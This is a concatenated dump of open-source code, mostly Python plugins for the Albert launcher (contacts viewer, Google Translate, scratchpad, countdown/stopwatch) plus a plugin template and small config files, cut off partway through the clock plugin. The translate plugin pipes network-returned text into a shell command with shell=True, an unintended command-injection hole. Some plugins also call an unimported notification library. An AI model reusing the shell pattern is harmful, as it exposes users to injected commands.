Field fragmentsField = Class.forName("android.app.FragmentManagerImpl").getDeclaredField("mAdded");
fragmentsField.setAccessible(true);
List<Fragment> fragmentList = (List<Fragment>) fragmentsField.get(fragmentManager);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1
&& null != fragmentList
&& fragmentList.size() > 0
&& null != fragmentList.get(0)) {
PermissionDebug.d(TAG, "reflect get child fragmentManager success");
return fragmentList.get(0).getChildFragmentManager();
}
} catch (Exception e) {
PermissionDebug.w(TAG, "try to get childFragmentManager failed " + e.toString());
e.printStackTrace();
}
}
return fragmentManager;
}
}
|
b478a1bfe509b826e8982d88f01e40ee7b7d6bfd
|
[
"Markdown",
"Java",
"Gradle"
] | 20
|
Java
|
soulqw/SoulPermission
|
1a5c1fa88e043282e153a9a8c0d5e8c04b71633c
|
6630bd5b6d64ba45715a2a922e0393e79d4170ff
|
refs/heads/master
|
<file_sep>"""{{ cookiecutter.plugin_short_description }}."""
from pathlib import Path
from typing import List, Dict
import os
import shutil
import subprocess
import sys
import time
import traceback
from fuzzywuzzy import process
{%- if cookiecutter.use_notifications == 'y' %}
from gi.repository import GdkPixbuf, Notify
{%- endif %}
import albert as v0
__title__ = "{{ cookiecutter.plugin_short_description }}"
__version__ = "{{ cookiecutter.albert_version }}"
__triggers__ = "{{ cookiecutter.trigger }} "
__authors__ = "{{ cookiecutter.author }}"
__homepage__ = "{{ cookiecutter.repo_base_url }}/{{ cookiecutter.plugin_name }}"
__exec_deps__ = []
__py_deps__ = []
icon_path = str(Path(__file__).parent / "{{ cookiecutter.plugin_name }}")
cache_path = Path(v0.cacheLocation()) / "{{ cookiecutter.plugin_name }}"
config_path = Path(v0.configLocation()) / "{{ cookiecutter.plugin_name }}"
data_path = Path(v0.dataLocation()) / "{{ cookiecutter.plugin_name }}"
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
{%- if cookiecutter.include_file_backed_var == 'y' %}
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
{%- endif %}
{%- if cookiecutter.include_keystroke_monitor == 'y' %}
# KeystrokeMonitor class ----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.3 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first
# Do not flood the web server with queries, otherwise it may block your IP.
keys_monitor = KeystrokeMonitor()
{%- endif %}
# plugin main functions -----------------------------------------------------------------------
def initialize():
"""Called when the extension is loaded (ticked in the settings) - blocking."""
pass
def finalize():
pass
def handleQuery(query) -> list:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
if query.isTriggered:
try:
query.disableSort()
results_setup = setup(query)
if results_setup:
return results_setup
query_str = query.string
{%- if cookiecutter.include_keystroke_monitor == 'y' %}
if len(query_str) < 2:
keys_monitor.reset()
return results
keys_monitor.report()
if keys_monitor.triggered():
# modify this...
results.append(get_as_item())
{%- else %}
# modify this...
results.append(get_as_item())
{%- endif %}
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=__title__,
icon=icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
v0.ClipAction(
f"Copy error - report it to {__homepage__[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
return results
# supplementary functions ---------------------------------------------------------------------
{%- if cookiecutter.use_notifications == 'y' %}
def notify(
msg: str, app_name: str=__title__, image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
{%- endif %}
def get_shell_cmd_as_item(
*, text: str, command: str, subtext: str = None, completion: str = None
):
"""Return shell command as an item - ready to be appended to the items list and be rendered by Albert."""
if subtext is None:
subtext = text
if completion is None:
completion = f"{__triggers__}{text}"
def run(command: str):
proc = subprocess.run(command.split(" "), capture_output=True, check=False)
if proc.returncode != 0:
stdout = proc.stdout.decode("utf-8")
stderr = proc.stderr.decode("utf-8")
notify(f"Error when executing {command}\n\nstdout: {stdout}\n\nstderr: {stderr}")
return v0.Item(
id=__title__,
icon=icon_path,
text=text,
subtext=subtext,
completion=completion,
actions=[
v0.FuncAction(text, lambda command=command: run(command=command)),
],
)
def get_as_item():
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
return v0.Item(
id=__title__,
icon=icon_path,
text=f"{sys.version}",
subtext="Python version",
completion="",
actions=[
v0.UrlAction("Open in xkcd.com", "https://www.xkcd.com/"),
v0.ClipAction("Copy URL", f"https://www.xkcd.com/"),
],
)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def data_exists(data_name: str) -> bool:
"""Check whwether a piece of data exists in the configuration directory."""
return (config_path / data_name).is_file()
def setup(query):
"""Setup is successful if an empty list is returned.
Use this function if you need the user to provide you data
"""
results = []
return results
<file_sep>"""Contact VCF Viewer."""
import json
import subprocess
import traceback
from pathlib import Path
from shutil import copyfile, which
from typing import Any, Dict, List, Optional, Sequence
import albert as v0
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "Contacts"
md_description = "Contact VCF Viewer"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/contacts"
md_bin_dependencies = []
md_lib_dependencies = []
icon_path = str(Path(__file__).parent / "contacts")
cache_path = Path(v0.cacheLocation()) / "contacts"
config_path = Path(v0.configLocation()) / "contacts"
data_path = Path(v0.dataLocation()) / "contacts"
stats_path = config_path / "stats"
vcf_path = Path(cache_path / "contacts.vcf")
class Contact:
def __init__(
self,
fullname: str,
telephones: Optional[Sequence[str]],
emails: Optional[Sequence[str]] = None,
):
self._fullname = fullname
self._telephones = telephones or []
self._emails = emails or []
@property
def fullname(self) -> str:
return self._fullname
@property
def telephones(self) -> Sequence[str]:
return self._telephones
@property
def emails(self) -> Sequence[str]:
return self._emails
@classmethod
def parse(cls, k, v):
def values(name: str) -> Sequence[Any]:
array = v.get(name)
if array is None:
return []
return [item["value"] for item in array]
return cls(
fullname=k,
telephones=[tel.replace(" ", "") for tel in values("tel")],
emails=values("email"),
)
contacts: List[Contact]
fullnames_to_contacts: Dict[str, Contact]
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def reindex_contacts() -> None:
global contacts, fullnames_to_contacts
contacts = get_new_contacts()
fullnames_to_contacts = {c.fullname: c for c in contacts}
def get_new_contacts() -> List[Contact]:
proc = subprocess.run(
["vcfxplr", "-c", str(vcf_path), "json", "-g", "fn"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
contacts_json = json.loads(proc.stdout)
return [Contact.parse(k, v) for k, v in contacts_json.items()]
# FileBackedVar class -------------------------------------------------------------------------
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
# plugin main functions -----------------------------------------------------------------------
def do_notify(msg: str, image=None):
app_name = "Contacts"
Notify.init(app_name)
image = image
n = Notify.Notification.new(app_name, msg, image)
n.show()
# supplementary functions ---------------------------------------------------------------------
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def data_exists(data_name: str) -> bool:
"""Check whwether a piece of data exists in the configuration directory."""
return (config_path / data_name).is_file()
def save_vcf_file(query: str):
p = Path(query).expanduser().absolute()
if not p.is_file():
do_notify(f'Given path "{p}" is not valid - please input it again.')
copyfile(p, vcf_path)
reindex_contacts()
do_notify(f"Copied VCF contacts file to -> {vcf_path}. You should be ready to go...")
def setup(query) -> bool: # type: ignore
if not which("vcfxplr"):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text='"vcfxplr" is not installed.',
subtext=(
"You can install it via pip - <u>pip3 install --user --upgrade vcfxplr</u>"
),
actions=[
ClipAction(
"Copy install command", "pip3 install --user --upgrade vcfxplr"
),
UrlAction(
'Open "vcfxplr" page', "https://github.com/bergercookie/vcfxplr"
),
],
)
)
return True
if vcf_path.exists() and not vcf_path.is_file():
raise RuntimeError(f"vcf file exists but it's not a file -> {vcf_path}")
if not vcf_path.exists():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please input the path to your VCF contacts file.",
subtext=f"{query.string}",
actions=[
FuncAction(
"Save VCF file", lambda query=query: save_vcf_file(query.string)
),
],
)
)
return True
return False
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "c "
def synopsis(self):
return "TODO"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
if vcf_path.is_file():
reindex_contacts()
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
results_setup = setup(query)
if results_setup:
return
query_str = query.string
if not query_str:
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
completion=query.trigger,
text="Add more characters to fuzzy-search",
actions=[],
)
)
results.append(self.get_reindex_item(query))
else:
matched = process.extract(query_str, fullnames_to_contacts.keys(), limit=10)
results.extend(
[
self.get_contact_as_item(query, fullnames_to_contacts[m[0]])
for m in matched
]
)
query.add(results)
except Exception: # user to report error
v0.critical(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_reindex_item(self, query):
return v0.Item(
id=md_name,
icon=[icon_path],
text="Re-index contacts",
completion=query.trigger,
actions=[FuncAction("Re-index contacts", reindex_contacts)],
)
def get_contact_as_item(self, query, contact: Contact):
"""
Return an item - ready to be appended to the items list and be rendered by Albert.
"""
text = contact.fullname
phones_and_emails = set(contact.emails).union(contact.telephones)
subtext = " | ".join(phones_and_emails)
completion = f"{query.trigger}{contact.fullname}"
actions = []
for field in phones_and_emails:
actions.append(ClipAction(f"Copy {field}", field))
actions.append(ClipAction("Copy name", contact.fullname))
return v0.Item(
id=md_name,
icon=[icon_path],
text=text,
subtext=subtext,
completion=completion,
actions=actions,
)
<file_sep>= Contributors' Guidelines =
* Make sure the commit subject line is formatted in imperative form and, more
generally follows these guidelines: https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
* Explain concisely what functionality the current PR serves and, if applicable,
how I should test it.
* Keep your branch **rebased** on top of the latest target destination branch
(i.e., master or devel if applicable). The PR, when merged must be rebased
before the actual merge.
Thanks for contributing to the project! :-)
<file_sep># -*- coding: utf-8 -*-
"""Translate text using Google Translate.
Usage: tr <src lang> <dest lang> <text>
Example: tr en fr hello
Check available languages here: https://cloud.google.com/translate/docs/languages
20191229 - bergercookie: Send a request only when the user has "slowed-down" typing (0.3s diff
between two consecutive chars) so that we send less requests to google. This way the IP is not
blocked.
"""
import ast
import json
import subprocess
import time
import traceback
import urllib.parse
import urllib.request
from collections import deque
from pathlib import Path
from typing import Deque, Dict, Optional
import albert as v0
md_name = "Google Translate"
md_description = "Google Translate to from different languages."
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins"
md_bin_dependencies = ["xclip"]
md_lib_dependencies = []
ua = (
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/62.0.3202.62 Safari/537.36"
)
url_template = (
"https://translate.googleapis.com/translate_a/single?client=gtx&sl=%s&tl=%s&dt=t&q=%s"
)
icon_path = str(Path(__file__).parent / "google_translate")
icon_path_hist = str(Path(__file__).parent / "google_translate_gray")
cache_path = Path(v0.cacheLocation()) / "google_translate"
data_path = Path(v0.dataLocation()) / "google_translate"
# have a history of the previous results ------------------------------------------------------
history_path = cache_path / "history.dat"
history_deque: Deque[Dict[str, str]] = deque(maxlen=30)
if history_path.exists() and not history_path.is_file():
raise RuntimeError(f"History path [{history_path}] must be a file, can't handle its type!")
if history_path.is_file():
with open(history_path, "r") as f:
lines = f.readlines()
history_deque.extend([ast.literal_eval(li) for li in lines])
def flush_history():
v0.info(f"Flushing google_translate history -> {history_path}...")
# TODO this kind of usage is theoretically unsafe, but most likely wont affect. The timer
# fires every ~1hr and traversing the deque takes so little time.
with open(history_path, "w") as f:
for di in history_deque:
f.write(f"{di}\n")
# plugin main functions -----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.4 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first # type: ignore
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first # type: ignore
keys_monitor = KeystrokeMonitor()
def select_item(lang_config: Dict[str, str], result: str):
save_search_result(**lang_config, dst_txt=result)
subprocess.Popen(f"echo {result}| xclip -selection clipboard", shell=True)
def save_search_result(*, src: str, dst: str, src_txt: str, dst_txt: str):
# sanity checks
if len(src_txt) <= 2 or len(dst_txt) <= 2:
return
history_deque.append(
{
"src": src,
"dst": dst,
"src_txt": src_txt,
"dst_txt": dst_txt,
}
)
# write it to file as well
flush_history()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tr "
def synopsis(self):
return "<src> <dst> <text>"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
flush_history()
def get_history_item(self, query, *, src: str, dst: str, src_txt: str, dst_txt) -> v0.Item:
return v0.Item(
id=f"{md_name}_prev_result",
text=dst_txt,
subtext=src_txt,
icon=[icon_path_hist],
completion=f"{query.trigger}{src} {dst} {src_txt}",
)
def get_sample_item(
self,
text: str = "",
subtext: str = "",
actions=[],
completion="",
):
if text == "":
text = 'Enter a query in the form of "<src> <dst> <text>"'
if subtext == "":
subtext = "Use <TAB> to reverse the translation"
return v0.Item(
id=md_name,
text=text,
subtext=subtext,
icon=[icon_path],
completion=completion,
actions=actions,
)
def handleQuery(self, query) -> None:
try:
fields = query.string.split()
if len(fields) < 3:
keys_monitor.reset()
query.add(self.get_sample_item())
return
src = fields[0]
dst = fields[1]
txt = " ".join(fields[2:])
completion = f"{query.trigger}{dst} {src} {txt}"
# determine if we can make the request --------------------------------------------
text = ""
subtext = ""
actions = []
keys_monitor.report()
if keys_monitor.triggered():
url = url_template % (src, dst, urllib.parse.quote_plus(txt))
req = urllib.request.Request(url, headers={"User-Agent": ua})
with urllib.request.urlopen(req) as response:
data = json.loads(response.read().decode("utf-8"))
result = data[0][0][0]
text = result
subtext = "%s -> %s: %s" % (
src.upper(),
dst.upper(),
txt,
)
actions = [
FuncAction(
"Copy translation to clipboard",
lambda lang_config={
"src": src,
"dst": dst,
"src_txt": txt,
}, result=result: select_item(
lang_config=lang_config, result=result
),
),
UrlAction(
"Open in browser",
f"https://translate.google.com/#view=home&op=translate&sl={src.lower()}&tl={dst.lower()}&text={txt}",
),
]
query.add(
self.get_sample_item(
text=text, subtext=subtext, actions=actions, completion=completion
)
)
# Show previous results
iterator = reversed(history_deque)
try:
next(iterator)
for di in iterator: # last is the most recent
query.add(
self.get_history_item(
query,
src=di["src"],
dst=di["dst"],
src_txt=di["src_txt"],
dst_txt=di["dst_txt"],
)
)
except StopIteration:
pass
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>version: '3'
services:
awesome-albert-plugins:
volumes:
- .:/src
build:
context: .
args:
UID: 1000
GID: 1000
SRC: "/src"
<file_sep>"""Scratchpad - Dump all your thoughts into a single textfile."""
import textwrap
import traceback
from pathlib import Path
import albert as v0
md_name = "Scratchpad"
md_description = "Scratchpad - Dump all your thoughts into a single textfile"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/scratchpad"
)
md_bin_dependencies = []
md_lib_dependencies = ["textwrap"]
icon_path = str(Path(__file__).parent / "scratchpad")
cache_path = Path(v0.cacheLocation()) / "scratchpad"
config_path = Path(v0.configLocation()) / "scratchpad"
data_path = Path(v0.dataLocation()) / "scratchpad"
s_store_fname = config_path / "fname"
# break long lines at the specified width
split_at_textwidth = 80
# plugin main functions -----------------------------------------------------------------------
if s_store_fname.is_file():
with open(s_store_fname, "r") as f:
p = Path(f.readline().strip()).expanduser()
s_path = p if p.is_file() else Path()
def save_to_scratchpad(line: str, sep=False):
with open(s_path, "a+") as f:
if split_at_textwidth is not None:
towrite = textwrap.fill(line, split_at_textwidth)
else:
towrite = line
towrite = f"\n{towrite}"
s = ""
if sep:
s = "\n\n" + "-" * 10 + "\n"
towrite = f"{s}{towrite}\n"
towrite = f"{towrite}\n"
f.write(towrite)
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_as_item(query):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
query_str = query.string.strip()
return v0.Item(
id=md_name,
icon=[icon_path],
text="Save to scratchpad",
subtext=query_str,
completion=f"{query.trigger}{query_str}",
actions=[
FuncAction(
f"Save to scratchpad ➡️ {s_path}",
lambda line=query_str: save_to_scratchpad(line),
),
FuncAction(
f"Save to scratchpad - New Section ➡️ {s_path}",
lambda line=query_str: save_to_scratchpad(line, sep=True),
),
],
)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def submit_fname(p: Path):
p = p.expanduser().resolve()
with open(s_store_fname, "w") as f:
f.write(str(p))
global s_path
s_path = p
# also create it
s_path.touch()
def setup(query):
"""Setup is successful if an empty list is returned."""
query_str = query.string
# abbreviations file
if not s_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify the location of the scratchpad file",
subtext="Paste the path to the file, then press ENTER",
actions=[
FuncAction("Submit path", lambda p=query_str: submit_fname(Path(p))),
],
)
)
return True
return False
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "s "
def synopsis(self):
return "add text to scratchpad"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
# trigger if the user has either explicitly called the plugin or when we have detected
# many words in the query. The latter is just a heuristic; I haven't decided whether
# it's worth keeping
if len(query.string.split()) < 4:
return
try:
results_setup = setup(query)
if results_setup:
return
results.append(get_as_item(query))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""Countdown/Stopwatch functionalities."""
import subprocess
import threading
import time
import traceback
from abc import ABC, abstractmethod
from pathlib import Path
from typing import List, Optional, Union
import albert as v0
import gi # isort:skip
gi.require_version("Notify", "0.7") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
md_name = "Countdown/Stopwatch"
md_description = "Countdown/Stopwatch functionalities"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/clock"
md_bin_dependencies = ["cvlc"]
countdown_path = str(Path(__file__).parent / "countdown.png")
stopwatch_path = str(Path(__file__).parent / "stopwatch.png")
sound_path = Path(__file__).parent.absolute() / "bing.wav"
cache_path = Path(v0.cacheLocation()) / "clock"
config_path = Path(v0.configLocation()) / "clock"
data_path = Path(v0.dataLocation()) / "clock"
# plugin main functions -----------------------------------------------------------------------
def play_sound(num):
for x in range(num):
t = threading.Timer(
0.5 * x,
lambda: subprocess.Popen(
[
"cvlc",
sound_path,
]
),
)
t.start()
def notify(app_name: str, msg: str, image=None):
if image is not None:
image = str(image)
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def format_time(t: float):
"""Return the string representation of t. t must be in *seconds*"""
if t >= 60:
return f"{round(t / 60.0, 2)} mins"
else:
return f"{round(t, 2)} secs"
def play_icon(started) -> str:
return "▶️" if started else "⏸"
class Watch(ABC):
def __init__(
self,
app_name: str,
image_path: str,
name: Optional[str],
started: bool = False,
total_time: float = 0.0,
):
self._name = name if name is not None else ""
self._to_remove = False
self._started = started
self._app_name = app_name
self._image_path = image_path
self._total_time = total_time
def name(
self,
) -> Optional[str]:
return self._name
def plus(self, mins: int):
self._total_time += 60 * mins
def minus(self, mins: int):
self._total_time -= 60 * mins
@abstractmethod
def start(self):
pass
def started(self) -> bool:
return self._started
@abstractmethod
def pause(self):
pass
def destroy(self):
self.notify(msg=f"Cancelling [{self.name()}]")
def notify(self, msg: str):
notify(app_name=self._app_name, msg=msg, image=self._image_path)
def to_remove(
self,
) -> bool:
return False
class Stopwatch(Watch):
def __init__(self, name=None):
super(Stopwatch, self).__init__(
name=name, app_name="Stopwatch", image_path=stopwatch_path, total_time=0
)
self.latest_stop_time = 0
self.latest_interval = 0
self.start()
def start(self):
self.latest_start = time.time()
self._started = True
self.notify(msg=f"Stopwatch [{self.name()}] starting")
def pause(self):
stop_time = time.time()
self.latest_interval = stop_time - self.latest_start
self._total_time += self.latest_interval
self._started = False
self.notify(
msg=f"Stopwatch [{self.name()}] paused, total: {format_time(self._total_time)}"
)
self.latest_stop_time = stop_time
def __str__(self):
# current interval
if self.started():
latest = time.time()
current_interval = latest - self.latest_start
total = self._total_time + current_interval
else:
latest = self.latest_stop_time
current_interval = self.latest_interval
total = self._total_time
s = get_as_subtext_field(play_icon(self._started))
s += get_as_subtext_field(self.name())
s += get_as_subtext_field(
format_time(total),
"Total",
)
s += get_as_subtext_field(
format_time(current_interval),
"Current Interval",
)[:-2]
return s
class Countdown(Watch):
def __init__(
self,
name: str,
count_from: float,
):
super(Countdown, self).__init__(
app_name="Countdown", image_path=countdown_path, name=name, total_time=count_from
)
self.latest_start = 0
self.start()
def start(self):
self._started = True
self.latest_start = time.time()
self.timer = threading.Timer(
self._total_time,
self.time_elapsed,
)
self.timer.start()
self.notify(
msg=(
f"Countdown [{self.name()}] starting, remaining:"
f" {format_time(self._total_time)}"
)
)
def pause(self):
self._started = False
self._total_time -= time.time() - self.latest_start
if self.timer:
self.timer.cancel()
self.notify(
msg=(
f"Countdown [{self.name()}] paused, remaining:"
f" {format_time(self._total_time)}"
)
)
def time_elapsed(self):
self.notify(msg=f"Countdown [{self.name()}] finished")
play_sound(1)
self._to_remove = True
def destroy(self):
super().destroy()
self.timer.cancel()
def __str__(self):
s = get_as_subtext_field(play_icon(self._started))
s += get_as_subtext_field(self.name())
# compute remaining time
total_time = self._total_time
if self.started():
total_time -= time.time() - self.latest_start
s += f"Remaining: {format_time(total_time)}"
return s
all_watches: List[Watch] = []
def catch_n_notify(fn):
def wrapper(*args, **kargs):
try:
fn(*args, **kargs)
except Exception:
notify(app_name=md_name, msg=f"Operation failed.\n\n{traceback.format_exc()}")
return wrapper
@catch_n_notify
def create_stopwatch(name) -> None:
all_watches.append(Stopwatch(name=name))
@catch_n_notify
def create_countdown(name: str, duration: Optional[float] = None) -> None:
if duration is None:
notify(app_name="Countdown", msg="No duration specified")
return
all_watches.append(
Countdown(
name=name,
count_from=float(duration) * 60,
)
)
def delete_item(item: Watch):
item.destroy()
all_watches.remove(item)
# supplementary functions ---------------------------------------------------------------------
def get_as_item(item: Watch) -> v0.Item:
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
actions = []
if item.started():
actions.append(
FuncAction(
"Pause",
lambda: item.pause(),
)
)
else:
actions.append(
FuncAction(
"Resume",
lambda: item.start(),
)
)
actions.append(
FuncAction(
"Remove",
lambda: delete_item(item),
)
)
actions.append(
FuncAction(
"Add 30 mins",
lambda: item.plus(30),
)
)
actions.append(
FuncAction(
"Substract 30 mins",
lambda: item.minus(30),
)
)
actions.append(
FuncAction(
"Add 5 mins",
lambda: item.plus(5),
)
)
actions.append(
FuncAction(
"Substract 5 mins",
lambda: item.minus(5),
)
)
return v0.Item(
id=md_name,
icon=[countdown_path if isinstance(item, Countdown) else stopwatch_path],
text=str(item),
subtext="",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(
config_path / data_name,
"w",
) as f:
f.write(data)
def load_data(
data_name,
) -> str:
"""Load a piece of data from the configuration directory."""
with open(
config_path / data_name,
"r",
) as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "cl "
def synopsis(self):
return "TODO"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (
cache_path,
config_path,
data_path,
):
p.mkdir(
parents=False,
exist_ok=True,
)
def finalize(self):
pass
def handleQuery(
self,
query,
) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_parts = [s.strip() for s in query.string.split()]
name = ""
if query_parts:
name = query_parts[0]
subtext_name = f"Name: {name}"
else:
subtext_name = "Please provide a name"
# ask for duration - only applicable for countdowns
duration = None
if len(query_parts) > 1:
duration = query_parts[1]
subtext_dur = f"Duration: {duration} mins"
else:
subtext_dur = "Please provide a duration [mins]"
results.extend(
[
v0.Item(
id=md_name,
icon=[countdown_path],
